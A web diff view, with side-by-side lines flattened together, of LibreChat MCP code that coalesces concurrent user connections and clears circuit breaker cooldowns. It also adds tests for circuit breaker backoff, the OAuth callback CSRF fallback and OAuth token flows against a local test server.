import { MCPServersRegistry } from '~/mcp/registry/MCPServersRegistry';
import { ConnectionsRepository } from '~/mcp/ConnectionsRepository'; import { ConnectionsRepository } from '~/mcp/ConnectionsRepository';
import { MCPConnectionFactory } from '~/mcp/MCPConnectionFactory';
import { MCPConnection } from './connection';
import { mcpConfig } from './mcpConfig'; import { mcpConfig } from './mcpConfig';
/** /**
@ -21,6 +21,8 @@ export abstract class UserConnectionManager {
protected userConnections: Map<string, Map<string, MCPConnection>> = new Map(); protected userConnections: Map<string, Map<string, MCPConnection>> = new Map();
/** Last activity timestamp for users (not per server) */ /** Last activity timestamp for users (not per server) */
protected userLastActivity: Map<string, number> = new Map(); protected userLastActivity: Map<string, number> = new Map();
/** In-flight connection promises keyed by `userId:serverName` — coalesces concurrent attempts */
protected pendingConnections: Map<string, Promise<MCPConnection>> = new Map();
/** Updates the last activity timestamp for a user */ /** Updates the last activity timestamp for a user */
protected updateUserLastActivity(userId: string): void { protected updateUserLastActivity(userId: string): void {
@ -31,8 +33,46 @@ export abstract class UserConnectionManager {
); );
} }
/** Gets or creates a connection for a specific user */ /** Gets or creates a connection for a specific user, coalescing concurrent attempts */
public async getUserConnection({ public async getUserConnection(
opts: {
serverName: string;
forceNew?: boolean;
} & Omit<t.OAuthConnectionOptions, 'useOAuth'>,
): Promise<MCPConnection> {
const { serverName, forceNew, user } = opts;
const userId = user?.id;
if (!userId) {
throw new McpError(ErrorCode.InvalidRequest, `[MCP] User object missing id property`);
}
const lockKey = `${userId}:${serverName}`;
if (!forceNew) {
const pending = this.pendingConnections.get(lockKey);
if (pending) {
logger.debug(`[MCP][User: ${userId}][${serverName}] Joining in-flight connection attempt`);
return pending;
}
}
const connectionPromise = this.createUserConnectionInternal(opts, userId);
if (!forceNew) {
this.pendingConnections.set(lockKey, connectionPromise);
}
try {
return await connectionPromise;
} finally {
if (!forceNew && this.pendingConnections.get(lockKey) === connectionPromise) {
this.pendingConnections.delete(lockKey);
}
}
}
private async createUserConnectionInternal(
{
serverName, serverName,
forceNew, forceNew,
user, user,
@ -48,12 +88,9 @@ export abstract class UserConnectionManager {
}: { }: {
serverName: string; serverName: string;
forceNew?: boolean; forceNew?: boolean;
} & Omit<t.OAuthConnectionOptions, 'useOAuth'>): Promise<MCPConnection> { } & Omit<t.OAuthConnectionOptions, 'useOAuth'>,
const userId = user?.id; userId: string,
if (!userId) { ): Promise<MCPConnection> {
throw new McpError(ErrorCode.InvalidRequest, `[MCP] User object missing id property`);
}
if (await this.appConnections!.has(serverName)) { if (await this.appConnections!.has(serverName)) {
throw new McpError( throw new McpError(
ErrorCode.InvalidRequest, ErrorCode.InvalidRequest,
@ -65,6 +102,9 @@ export abstract class UserConnectionManager {
const userServerMap = this.userConnections.get(userId); const userServerMap = this.userConnections.get(userId);
let connection = forceNew ? undefined : userServerMap?.get(serverName); let connection = forceNew ? undefined : userServerMap?.get(serverName);
if (forceNew) {
MCPConnection.clearCooldown(serverName);
}
const now = Date.now(); const now = Date.now();
// Check if user is idle // Check if user is idle
@ -185,6 +225,7 @@ export abstract class UserConnectionManager {
/** Disconnects and removes a specific user connection */ /** Disconnects and removes a specific user connection */
public async disconnectUserConnection(userId: string, serverName: string): Promise<void> { public async disconnectUserConnection(userId: string, serverName: string): Promise<void> {
this.pendingConnections.delete(`${userId}:${serverName}`);
const userMap = this.userConnections.get(userId); const userMap = this.userConnections.get(userId);
const connection = userMap?.get(serverName); const connection = userMap?.get(serverName);
if (connection) { if (connection) {
@ -212,6 +253,12 @@ export abstract class UserConnectionManager {
); );
} }
await Promise.allSettled(disconnectPromises); await Promise.allSettled(disconnectPromises);
// Clean up any pending connection promises for this user
for (const key of this.pendingConnections.keys()) {
if (key.startsWith(`${userId}:`)) {
this.pendingConnections.delete(key);
}
}
// Ensure user activity timestamp is removed // Ensure user activity timestamp is removed
this.userLastActivity.delete(userId); this.userLastActivity.delete(userId);
logger.info(`[MCP][User: ${userId}] All connections processed for disconnection.`); logger.info(`[MCP][User: ${userId}] All connections processed for disconnection.`);

View file

@ -559,3 +559,242 @@ describe('extractSSEErrorMessage', () => {
}); });
}); });
}); });
/**
* Tests for circuit breaker logic.
*
* Uses standalone implementations that mirror the static/private circuit breaker
* methods in MCPConnection. Same approach as the error detection tests above.
*/
describe('MCPConnection Circuit Breaker', () => {
/** 5 cycles within 60s triggers a 30s cooldown */
const CB_MAX_CYCLES = 5;
const CB_CYCLE_WINDOW_MS = 60_000;
const CB_CYCLE_COOLDOWN_MS = 30_000;
/** 3 failed rounds within 120s triggers exponential backoff (30s - 300s) */
const CB_MAX_FAILED_ROUNDS = 3;
const CB_FAILED_WINDOW_MS = 120_000;
const CB_BASE_BACKOFF_MS = 30_000;
const CB_MAX_BACKOFF_MS = 300_000;
interface CircuitBreakerState {
cycleCount: number;
cycleWindowStart: number;
cooldownUntil: number;
failedRounds: number;
failedWindowStart: number;
failedBackoffUntil: number;
}
function createCB(): CircuitBreakerState {
return {
cycleCount: 0,
cycleWindowStart: Date.now(),
cooldownUntil: 0,
failedRounds: 0,
failedWindowStart: Date.now(),
failedBackoffUntil: 0,
};
}
function isCircuitOpen(cb: CircuitBreakerState): boolean {
const now = Date.now();
return now < cb.cooldownUntil || now < cb.failedBackoffUntil;
}
function recordCycle(cb: CircuitBreakerState): void {
const now = Date.now();
if (now - cb.cycleWindowStart > CB_CYCLE_WINDOW_MS) {
cb.cycleCount = 0;
cb.cycleWindowStart = now;
}
cb.cycleCount++;
if (cb.cycleCount >= CB_MAX_CYCLES) {
cb.cooldownUntil = now + CB_CYCLE_COOLDOWN_MS;
cb.cycleCount = 0;
cb.cycleWindowStart = now;
}
}
function recordFailedRound(cb: CircuitBreakerState): void {
const now = Date.now();
if (now - cb.failedWindowStart > CB_FAILED_WINDOW_MS) {
cb.failedRounds = 0;
cb.failedWindowStart = now;
}
cb.failedRounds++;
if (cb.failedRounds >= CB_MAX_FAILED_ROUNDS) {
const backoff = Math.min(
CB_BASE_BACKOFF_MS * Math.pow(2, cb.failedRounds - CB_MAX_FAILED_ROUNDS),
CB_MAX_BACKOFF_MS,
);
cb.failedBackoffUntil = now + backoff;
}
}
function resetFailedRounds(cb: CircuitBreakerState): void {
cb.failedRounds = 0;
cb.failedWindowStart = Date.now();
cb.failedBackoffUntil = 0;
}
beforeEach(() => {
jest.useFakeTimers();
});
afterEach(() => {
jest.useRealTimers();
});
describe('cycle tracking', () => {
it('should not trigger cooldown for fewer than 5 cycles', () => {
const now = Date.now();
jest.setSystemTime(now);
const cb = createCB();
for (let i = 0; i < CB_MAX_CYCLES - 1; i++) {
recordCycle(cb);
}
expect(isCircuitOpen(cb)).toBe(false);
});
it('should trigger 30s cooldown after 5 cycles within 60s', () => {
const now = Date.now();
jest.setSystemTime(now);
const cb = createCB();
for (let i = 0; i < CB_MAX_CYCLES; i++) {
recordCycle(cb);
}
expect(isCircuitOpen(cb)).toBe(true);
jest.advanceTimersByTime(29_000);
expect(isCircuitOpen(cb)).toBe(true);
jest.advanceTimersByTime(1_000);
expect(isCircuitOpen(cb)).toBe(false);
});
it('should reset cycle count when window expires', () => {
const now = Date.now();
jest.setSystemTime(now);
const cb = createCB();
for (let i = 0; i < CB_MAX_CYCLES - 1; i++) {
recordCycle(cb);
}
jest.advanceTimersByTime(CB_CYCLE_WINDOW_MS + 1);
recordCycle(cb);
expect(isCircuitOpen(cb)).toBe(false);
});
});
describe('failed round tracking', () => {
it('should not trigger backoff for fewer than 3 failures', () => {
const now = Date.now();
jest.setSystemTime(now);
const cb = createCB();
for (let i = 0; i < CB_MAX_FAILED_ROUNDS - 1; i++) {
recordFailedRound(cb);
}
expect(isCircuitOpen(cb)).toBe(false);
});
it('should trigger 30s backoff after 3 failures within 120s', () => {
const now = Date.now();
jest.setSystemTime(now);
const cb = createCB();
for (let i = 0; i < CB_MAX_FAILED_ROUNDS; i++) {
recordFailedRound(cb);
}
expect(isCircuitOpen(cb)).toBe(true);
jest.advanceTimersByTime(CB_BASE_BACKOFF_MS);
expect(isCircuitOpen(cb)).toBe(false);
});
it('should use exponential backoff based on failure count', () => {
jest.setSystemTime(Date.now());
const cb = createCB();
for (let i = 0; i < 3; i++) {
recordFailedRound(cb);
}
expect(cb.failedBackoffUntil - Date.now()).toBe(30_000);
recordFailedRound(cb);
expect(cb.failedBackoffUntil - Date.now()).toBe(60_000);
recordFailedRound(cb);
expect(cb.failedBackoffUntil - Date.now()).toBe(120_000);
recordFailedRound(cb);
expect(cb.failedBackoffUntil - Date.now()).toBe(240_000);
// capped at 300s
recordFailedRound(cb);
expect(cb.failedBackoffUntil - Date.now()).toBe(300_000);
});
it('should reset failed window when window expires', () => {
const now = Date.now();
jest.setSystemTime(now);
const cb = createCB();
recordFailedRound(cb);
recordFailedRound(cb);
jest.advanceTimersByTime(CB_FAILED_WINDOW_MS + 1);
recordFailedRound(cb);
expect(isCircuitOpen(cb)).toBe(false);
});
});
describe('resetFailedRounds', () => {
it('should clear failed round state on successful connection', () => {
const now = Date.now();
jest.setSystemTime(now);
const cb = createCB();
for (let i = 0; i < CB_MAX_FAILED_ROUNDS; i++) {
recordFailedRound(cb);
}
expect(isCircuitOpen(cb)).toBe(true);
resetFailedRounds(cb);
expect(isCircuitOpen(cb)).toBe(false);
expect(cb.failedRounds).toBe(0);
expect(cb.failedBackoffUntil).toBe(0);
});
});
describe('clearCooldown (registry deletion)', () => {
it('should allow connections after clearing circuit breaker state', () => {
const now = Date.now();
jest.setSystemTime(now);
const registry = new Map<string, CircuitBreakerState>();
const serverName = 'test-server';
const cb = createCB();
registry.set(serverName, cb);
for (let i = 0; i < CB_MAX_CYCLES; i++) {
recordCycle(cb);
}
expect(isCircuitOpen(cb)).toBe(true);
registry.delete(serverName);
const newCb = createCB();
expect(isCircuitOpen(newCb)).toBe(false);
});
});
});

View file

@ -207,6 +207,7 @@ describe('MCPConnection Agent lifecycle streamable-http', () => {
}); });
afterEach(async () => { afterEach(async () => {
MCPConnection.clearCooldown('test');
await safeDisconnect(conn); await safeDisconnect(conn);
conn = null; conn = null;
jest.restoreAllMocks(); jest.restoreAllMocks();
@ -366,6 +367,7 @@ describe('MCPConnection Agent lifecycle SSE', () => {
}); });
afterEach(async () => { afterEach(async () => {
MCPConnection.clearCooldown('test-sse');
await safeDisconnect(conn); await safeDisconnect(conn);
conn = null; conn = null;
jest.restoreAllMocks(); jest.restoreAllMocks();
@ -453,6 +455,7 @@ describe('Regression: old per-request Agent pattern leaks agents', () => {
}); });
afterEach(async () => { afterEach(async () => {
MCPConnection.clearCooldown('test-regression');
await safeDisconnect(conn); await safeDisconnect(conn);
conn = null; conn = null;
jest.restoreAllMocks(); jest.restoreAllMocks();
@ -675,6 +678,7 @@ describe('MCPConnection SSE GET stream recovery integration', () => {
}); });
afterEach(async () => { afterEach(async () => {
MCPConnection.clearCooldown('test-sse-recovery');
await safeDisconnect(conn); await safeDisconnect(conn);
conn = null; conn = null;
jest.restoreAllMocks(); jest.restoreAllMocks();

View file

@ -275,7 +275,7 @@ describe('MCPConnectionFactory', () => {
expect(mockFlowManager.initFlow).toHaveBeenCalledWith( expect(mockFlowManager.initFlow).toHaveBeenCalledWith(
'flow123', 'flow123',
'mcp_oauth', 'mcp_oauth',
mockFlowData.flowMetadata, expect.objectContaining(mockFlowData.flowMetadata),
); );
const initCallOrder = mockFlowManager.initFlow.mock.invocationCallOrder[0]; const initCallOrder = mockFlowManager.initFlow.mock.invocationCallOrder[0];
const oauthStartCallOrder = (oauthOptions.oauthStart as jest.Mock).mock const oauthStartCallOrder = (oauthOptions.oauthStart as jest.Mock).mock
@ -550,7 +550,7 @@ describe('MCPConnectionFactory', () => {
expect(mockFlowManager.initFlow).toHaveBeenCalledWith( expect(mockFlowManager.initFlow).toHaveBeenCalledWith(
'flow123', 'flow123',
'mcp_oauth', 'mcp_oauth',
mockFlowData.flowMetadata, expect.objectContaining(mockFlowData.flowMetadata),
); );
const initCallOrder = mockFlowManager.initFlow.mock.invocationCallOrder[0]; const initCallOrder = mockFlowManager.initFlow.mock.invocationCallOrder[0];
const oauthStartCallOrder = (oauthOptions.oauthStart as jest.Mock).mock const oauthStartCallOrder = (oauthOptions.oauthStart as jest.Mock).mock

View file

@ -0,0 +1,232 @@
/**
* Tests for the OAuth callback CSRF fallback logic.
*
* The callback route validates requests via three mechanisms (in order):
* 1. CSRF cookie (HMAC-based, set during initiate)
* 2. Session cookie (bound to authenticated userId)
* 3. Active PENDING flow in FlowStateManager (fallback for SSE/chat flows)
*
* This suite tests mechanism 3 the PENDING flow fallback including
* staleness enforcement and rejection of non-PENDING flows.
*
* These tests exercise the validation functions directly for fast,
* focused coverage. Route-level integration tests using supertest
* are in api/server/routes/__tests__/mcp.spec.js ("CSRF fallback
* via active PENDING flow" describe block).
*/
import { Keyv } from 'keyv';
import { FlowStateManager, PENDING_STALE_MS } from '~/flow/manager';
import type { Request, Response } from 'express';
import {
generateOAuthCsrfToken,
OAUTH_SESSION_COOKIE,
validateOAuthSession,
OAUTH_CSRF_COOKIE,
validateOAuthCsrf,
} from '~/oauth/csrf';
import { MockKeyv } from './helpers/oauthTestServer';
jest.mock('@librechat/data-schemas', () => ({
logger: {
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
debug: jest.fn(),
},
encryptV2: jest.fn(async (val: string) => `enc:${val}`),
decryptV2: jest.fn(async (val: string) => val.replace(/^enc:/, '')),
}));
const CSRF_COOKIE_PATH = '/api/mcp';
function makeReq(cookies: Record<string, string> = {}): Request {
return { cookies } as unknown as Request;
}
function makeRes(): Response {
const res = {
clearCookie: jest.fn(),
} as unknown as Response;
return res;
}
/**
* Replicate the callback route's three-tier validation logic.
* Returns which mechanism (if any) authorized the request.
*/
async function validateCallback(
req: Request,
res: Response,
flowId: string,
flowManager: FlowStateManager,
): Promise<'csrf' | 'session' | 'pendingFlow' | false> {
const flowUserId = flowId.split(':')[0];
const hasCsrf = validateOAuthCsrf(req, res, flowId, CSRF_COOKIE_PATH);
if (hasCsrf) {
return 'csrf';
}
const hasSession = validateOAuthSession(req, flowUserId);
if (hasSession) {
return 'session';
}
const pendingFlow = await flowManager.getFlowState(flowId, 'mcp_oauth');
const pendingAge = pendingFlow?.createdAt ? Date.now() - pendingFlow.createdAt : Infinity;
if (pendingFlow?.status === 'PENDING' && pendingAge < PENDING_STALE_MS) {
return 'pendingFlow';
}
return false;
}
describe('OAuth Callback CSRF Fallback', () => {
let flowManager: FlowStateManager;
beforeEach(() => {
process.env.JWT_SECRET = 'test-secret-for-csrf';
const store = new MockKeyv();
flowManager = new FlowStateManager(store as unknown as Keyv, { ttl: 300000, ci: true });
});
afterEach(() => {
delete process.env.JWT_SECRET;
jest.clearAllMocks();
});
describe('CSRF cookie validation (mechanism 1)', () => {
it('should accept valid CSRF cookie', async () => {
const flowId = 'user1:test-server';
const csrfToken = generateOAuthCsrfToken(flowId, 'test-secret-for-csrf');
const req = makeReq({ [OAUTH_CSRF_COOKIE]: csrfToken });
const res = makeRes();
const result = await validateCallback(req, res, flowId, flowManager);
expect(result).toBe('csrf');
});
it('should reject invalid CSRF cookie', async () => {
const flowId = 'user1:test-server';
const req = makeReq({ [OAUTH_CSRF_COOKIE]: 'wrong-token-value' });
const res = makeRes();
const result = await validateCallback(req, res, flowId, flowManager);
expect(result).toBe(false);
});
});
describe('Session cookie validation (mechanism 2)', () => {
it('should accept valid session cookie when CSRF is absent', async () => {
const flowId = 'user1:test-server';
const sessionToken = generateOAuthCsrfToken('user1', 'test-secret-for-csrf');
const req = makeReq({ [OAUTH_SESSION_COOKIE]: sessionToken });
const res = makeRes();
const result = await validateCallback(req, res, flowId, flowManager);
expect(result).toBe('session');
});
});
describe('PENDING flow fallback (mechanism 3)', () => {
it('should accept when a fresh PENDING flow exists and no cookies are present', async () => {
const flowId = 'user1:test-server';
await flowManager.initFlow(flowId, 'mcp_oauth', { serverName: 'test-server' });
const req = makeReq();
const res = makeRes();
const result = await validateCallback(req, res, flowId, flowManager);
expect(result).toBe('pendingFlow');
});
it('should reject when no PENDING flow, no CSRF cookie, and no session cookie', async () => {
const flowId = 'user1:test-server';
const req = makeReq();
const res = makeRes();
const result = await validateCallback(req, res, flowId, flowManager);
expect(result).toBe(false);
});
it('should reject when only a COMPLETED flow exists (not PENDING)', async () => {
const flowId = 'user1:test-server';
await flowManager.initFlow(flowId, 'mcp_oauth', { serverName: 'test-server' });
await flowManager.completeFlow(flowId, 'mcp_oauth', { access_token: 'tok' } as never);
const req = makeReq();
const res = makeRes();
const result = await validateCallback(req, res, flowId, flowManager);
expect(result).toBe(false);
});
it('should reject when only a FAILED flow exists', async () => {
const flowId = 'user1:test-server';
await flowManager.initFlow(flowId, 'mcp_oauth', {});
await flowManager.failFlow(flowId, 'mcp_oauth', 'some error');
const req = makeReq();
const res = makeRes();
const result = await validateCallback(req, res, flowId, flowManager);
expect(result).toBe(false);
});
it('should reject when PENDING flow is stale (older than PENDING_STALE_MS)', async () => {
const flowId = 'user1:test-server';
await flowManager.initFlow(flowId, 'mcp_oauth', { serverName: 'test-server' });
// Artificially age the flow past the staleness threshold
const store = (flowManager as unknown as { keyv: { get: (k: string) => Promise<unknown> } })
.keyv;
const flowState = (await store.get(`mcp_oauth:${flowId}`)) as { createdAt: number };
flowState.createdAt = Date.now() - PENDING_STALE_MS - 1000;
const req = makeReq();
const res = makeRes();
const result = await validateCallback(req, res, flowId, flowManager);
expect(result).toBe(false);
});
it('should accept PENDING flow that is just under the staleness threshold', async () => {
const flowId = 'user1:test-server';
await flowManager.initFlow(flowId, 'mcp_oauth', { serverName: 'test-server' });
// Flow was just created, well under threshold
const req = makeReq();
const res = makeRes();
const result = await validateCallback(req, res, flowId, flowManager);
expect(result).toBe('pendingFlow');
});
});
describe('Priority ordering', () => {
it('should prefer CSRF cookie over PENDING flow', async () => {
const flowId = 'user1:test-server';
await flowManager.initFlow(flowId, 'mcp_oauth', { serverName: 'test-server' });
const csrfToken = generateOAuthCsrfToken(flowId, 'test-secret-for-csrf');
const req = makeReq({ [OAUTH_CSRF_COOKIE]: csrfToken });
const res = makeRes();
const result = await validateCallback(req, res, flowId, flowManager);
expect(result).toBe('csrf');
});
it('should prefer session cookie over PENDING flow when CSRF is absent', async () => {
const flowId = 'user1:test-server';
await flowManager.initFlow(flowId, 'mcp_oauth', { serverName: 'test-server' });
const sessionToken = generateOAuthCsrfToken('user1', 'test-secret-for-csrf');
const req = makeReq({ [OAUTH_SESSION_COOKIE]: sessionToken });
const res = makeRes();
const result = await validateCallback(req, res, flowId, flowManager);
expect(result).toBe('session');
});
});
});

View file

@ -0,0 +1,268 @@
/**
* Tests for MCPConnection OAuth event cycle against a real OAuth-gated MCP server.
*
* Verifies: oauthRequired emission on 401, oauthHandled reconnection,
* oauthFailed rejection, timeout behavior, and token expiry mid-session.
*/
import { MCPConnection } from '~/mcp/connection';
import { createOAuthMCPServer } from './helpers/oauthTestServer';
import type { OAuthTestServer } from './helpers/oauthTestServer';
import type { MCPOAuthTokens } from '~/mcp/oauth';
jest.mock('@librechat/data-schemas', () => ({
logger: {
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
debug: jest.fn(),
},
encryptV2: jest.fn(async (val: string) => `enc:${val}`),
decryptV2: jest.fn(async (val: string) => val.replace(/^enc:/, '')),
}));
jest.mock('~/auth', () => ({
createSSRFSafeUndiciConnect: jest.fn(() => undefined),
resolveHostnameSSRF: jest.fn(async () => false),
}));
jest.mock('~/mcp/mcpConfig', () => ({
mcpConfig: { CONNECTION_CHECK_TTL: 0, USER_CONNECTION_IDLE_TIMEOUT: 30 * 60 * 1000 },
}));
async function safeDisconnect(conn: MCPConnection | null): Promise<void> {
if (!conn) {
return;
}
try {
await conn.disconnect();
} catch {
// Ignore disconnect errors during cleanup
}
}
async function exchangeCodeForToken(serverUrl: string): Promise<string> {
const authRes = await fetch(`${serverUrl}authorize?redirect_uri=http://localhost&state=test`, {
redirect: 'manual',
});
const location = authRes.headers.get('location') ?? '';
const code = new URL(location).searchParams.get('code') ?? '';
const tokenRes = await fetch(`${serverUrl}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const data = (await tokenRes.json()) as { access_token: string };
return data.access_token;
}
describe('MCPConnection OAuth Events — Real Server', () => {
let server: OAuthTestServer;
let connection: MCPConnection | null = null;
beforeEach(() => {
MCPConnection.clearCooldown('test-server');
});
afterEach(async () => {
await safeDisconnect(connection);
connection = null;
if (server) {
await server.close();
}
jest.clearAllMocks();
});
describe('oauthRequired event', () => {
beforeEach(async () => {
server = await createOAuthMCPServer({ tokenTTLMs: 60000 });
});
it('should emit oauthRequired when connecting without a token', async () => {
connection = new MCPConnection({
serverName: 'test-server',
serverConfig: { type: 'streamable-http', url: server.url },
userId: 'user-1',
});
const oauthRequiredPromise = new Promise<{
serverName: string;
error: Error;
serverUrl?: string;
userId?: string;
}>((resolve) => {
connection!.on('oauthRequired', (data) => {
resolve(
data as {
serverName: string;
error: Error;
serverUrl?: string;
userId?: string;
},
);
});
});
// Connection will fail with 401, emitting oauthRequired
const connectPromise = connection.connect().catch(() => {
// Expected to fail since no one handles oauthRequired
});
let raceTimer: NodeJS.Timeout | undefined;
const eventData = await Promise.race([
oauthRequiredPromise,
new Promise<never>((_, reject) => {
raceTimer = setTimeout(
() => reject(new Error('Timed out waiting for oauthRequired')),
10000,
);
}),
]).finally(() => clearTimeout(raceTimer));
expect(eventData.serverName).toBe('test-server');
expect(eventData.error).toBeDefined();
// Emit oauthFailed to unblock connect()
connection.emit('oauthFailed', new Error('test cleanup'));
await connectPromise.catch(() => undefined);
});
it('should not emit oauthRequired when connecting with a valid token', async () => {
const accessToken = await exchangeCodeForToken(server.url);
connection = new MCPConnection({
serverName: 'test-server',
serverConfig: { type: 'streamable-http', url: server.url },
userId: 'user-1',
oauthTokens: {
access_token: accessToken,
token_type: 'Bearer',
} as MCPOAuthTokens,
});
let oauthFired = false;
connection.on('oauthRequired', () => {
oauthFired = true;
});
await connection.connect();
expect(await connection.isConnected()).toBe(true);
expect(oauthFired).toBe(false);
});
});
describe('oauthHandled reconnection', () => {
beforeEach(async () => {
server = await createOAuthMCPServer({ tokenTTLMs: 60000 });
});
it('should succeed on retry after oauthHandled provides valid tokens', async () => {
connection = new MCPConnection({
serverName: 'test-server',
serverConfig: {
type: 'streamable-http',
url: server.url,
initTimeout: 15000,
},
userId: 'user-1',
});
// First connect fails with 401 → oauthRequired fires
let oauthFired = false;
connection.on('oauthRequired', () => {
oauthFired = true;
connection!.emit('oauthFailed', new Error('Will retry with tokens'));
});
// First attempt fails as expected
await expect(connection.connect()).rejects.toThrow();
expect(oauthFired).toBe(true);
// Now set valid tokens and reconnect
const accessToken = await exchangeCodeForToken(server.url);
connection.setOAuthTokens({
access_token: accessToken,
token_type: 'Bearer',
} as MCPOAuthTokens);
await connection.connect();
expect(await connection.isConnected()).toBe(true);
});
});
describe('oauthFailed rejection', () => {
beforeEach(async () => {
server = await createOAuthMCPServer({ tokenTTLMs: 60000 });
});
it('should reject connect() when oauthFailed is emitted', async () => {
connection = new MCPConnection({
serverName: 'test-server',
serverConfig: {
type: 'streamable-http',
url: server.url,
initTimeout: 15000,
},
userId: 'user-1',
});
connection.on('oauthRequired', () => {
connection!.emit('oauthFailed', new Error('User denied OAuth'));
});
await expect(connection.connect()).rejects.toThrow();
});
});
describe('Token expiry during session', () => {
it('should detect expired token on reconnect and emit oauthRequired', async () => {
server = await createOAuthMCPServer({ tokenTTLMs: 1000 });
const accessToken = await exchangeCodeForToken(server.url);
connection = new MCPConnection({
serverName: 'test-server',
serverConfig: {
type: 'streamable-http',
url: server.url,
initTimeout: 15000,
},
userId: 'user-1',
oauthTokens: {
access_token: accessToken,
token_type: 'Bearer',
} as MCPOAuthTokens,
});
// Initial connect should succeed
await connection.connect();
expect(await connection.isConnected()).toBe(true);
await connection.disconnect();
// Wait for token to expire
await new Promise((r) => setTimeout(r, 1200));
// Reconnect should trigger oauthRequired since token is expired on the server
let oauthFired = false;
connection.on('oauthRequired', () => {
oauthFired = true;
connection!.emit('oauthFailed', new Error('Will retry with fresh token'));
});
// First reconnect fails with 401 → oauthRequired
await expect(connection.connect()).rejects.toThrow();
expect(oauthFired).toBe(true);
// Get fresh token and reconnect
const newToken = await exchangeCodeForToken(server.url);
connection.setOAuthTokens({
access_token: newToken,
token_type: 'Bearer',
} as MCPOAuthTokens);
await connection.connect();
expect(await connection.isConnected()).toBe(true);
});
});
});

View file

@ -0,0 +1,545 @@
/**
* OAuth flow tests against a real HTTP server.
*
* Tests MCPOAuthHandler.refreshOAuthTokens and MCPTokenStorage lifecycle
* using a real test OAuth server (not mocked SDK functions).
*/
import { createHash } from 'crypto';
import { Keyv } from 'keyv';
import { MCPTokenStorage, MCPOAuthHandler } from '~/mcp/oauth';
import { FlowStateManager } from '~/flow/manager';
import { createOAuthMCPServer, MockKeyv, InMemoryTokenStore } from './helpers/oauthTestServer';
import type { OAuthTestServer } from './helpers/oauthTestServer';
import type { MCPOAuthTokens } from '~/mcp/oauth';
jest.mock('@librechat/data-schemas', () => ({
logger: {
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
debug: jest.fn(),
},
encryptV2: jest.fn(async (val: string) => `enc:${val}`),
decryptV2: jest.fn(async (val: string) => val.replace(/^enc:/, '')),
}));
/** Bypass SSRF validation — these tests use real local HTTP servers. */
jest.mock('~/auth', () => ({
...jest.requireActual('~/auth'),
isSSRFTarget: jest.fn(() => false),
resolveHostnameSSRF: jest.fn(async () => false),
}));
describe('MCP OAuth Flow — Real HTTP Server', () => {
afterEach(() => {
jest.clearAllMocks();
});
describe('Token refresh with real server', () => {
let server: OAuthTestServer;
beforeEach(async () => {
server = await createOAuthMCPServer({
tokenTTLMs: 60000,
issueRefreshTokens: true,
});
});
afterEach(async () => {
await server.close();
});
it('should refresh tokens with stored client info via real /token endpoint', async () => {
// First get initial tokens
const code = await server.getAuthCode();
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const initial = (await tokenRes.json()) as {
access_token: string;
refresh_token: string;
};
expect(initial.refresh_token).toBeDefined();
// Register a client so we have clientInfo
const regRes = await fetch(`${server.url}register`, {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ redirect_uris: ['http://localhost/callback'] }),
});
const clientInfo = (await regRes.json()) as {
client_id: string;
client_secret: string;
};
// Refresh tokens using the real endpoint
const refreshed = await MCPOAuthHandler.refreshOAuthTokens(
initial.refresh_token,
{
serverName: 'test-server',
serverUrl: server.url,
clientInfo: {
...clientInfo,
redirect_uris: ['http://localhost/callback'],
},
},
{},
{
token_url: `${server.url}token`,
client_id: clientInfo.client_id,
client_secret: clientInfo.client_secret,
token_exchange_method: 'DefaultPost',
},
);
expect(refreshed.access_token).toBeDefined();
expect(refreshed.access_token).not.toBe(initial.access_token);
expect(refreshed.token_type).toBe('Bearer');
expect(refreshed.obtained_at).toBeDefined();
});
it('should get new refresh token when server rotates', async () => {
const rotatingServer = await createOAuthMCPServer({
tokenTTLMs: 60000,
issueRefreshTokens: true,
rotateRefreshTokens: true,
});
try {
const code = await rotatingServer.getAuthCode();
const tokenRes = await fetch(`${rotatingServer.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const initial = (await tokenRes.json()) as {
access_token: string;
refresh_token: string;
};
const refreshed = await MCPOAuthHandler.refreshOAuthTokens(
initial.refresh_token,
{
serverName: 'test-server',
serverUrl: rotatingServer.url,
},
{},
{
token_url: `${rotatingServer.url}token`,
client_id: 'anon',
token_exchange_method: 'DefaultPost',
},
);
expect(refreshed.access_token).not.toBe(initial.access_token);
expect(refreshed.refresh_token).toBeDefined();
expect(refreshed.refresh_token).not.toBe(initial.refresh_token);
} finally {
await rotatingServer.close();
}
});
it('should fail refresh with invalid refresh token', async () => {
await expect(
MCPOAuthHandler.refreshOAuthTokens(
'invalid-refresh-token',
{
serverName: 'test-server',
serverUrl: server.url,
},
{},
{
token_url: `${server.url}token`,
client_id: 'anon',
token_exchange_method: 'DefaultPost',
},
),
).rejects.toThrow();
});
});
describe('OAuth server metadata discovery', () => {
let server: OAuthTestServer;
beforeEach(async () => {
server = await createOAuthMCPServer({ issueRefreshTokens: true });
});
afterEach(async () => {
await server.close();
});
it('should expose /.well-known/oauth-authorization-server', async () => {
const res = await fetch(`${server.url}.well-known/oauth-authorization-server`);
expect(res.status).toBe(200);
const metadata = (await res.json()) as {
authorization_endpoint: string;
token_endpoint: string;
registration_endpoint: string;
grant_types_supported: string[];
};
expect(metadata.authorization_endpoint).toContain('/authorize');
expect(metadata.token_endpoint).toContain('/token');
expect(metadata.registration_endpoint).toContain('/register');
expect(metadata.grant_types_supported).toContain('authorization_code');
expect(metadata.grant_types_supported).toContain('refresh_token');
});
it('should not advertise refresh_token grant when disabled', async () => {
const noRefreshServer = await createOAuthMCPServer({
issueRefreshTokens: false,
});
try {
const res = await fetch(`${noRefreshServer.url}.well-known/oauth-authorization-server`);
const metadata = (await res.json()) as { grant_types_supported: string[] };
expect(metadata.grant_types_supported).not.toContain('refresh_token');
} finally {
await noRefreshServer.close();
}
});
});
describe('Dynamic client registration', () => {
let server: OAuthTestServer;
beforeEach(async () => {
server = await createOAuthMCPServer();
});
afterEach(async () => {
await server.close();
});
it('should register a client via /register endpoint', async () => {
const res = await fetch(`${server.url}register`, {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
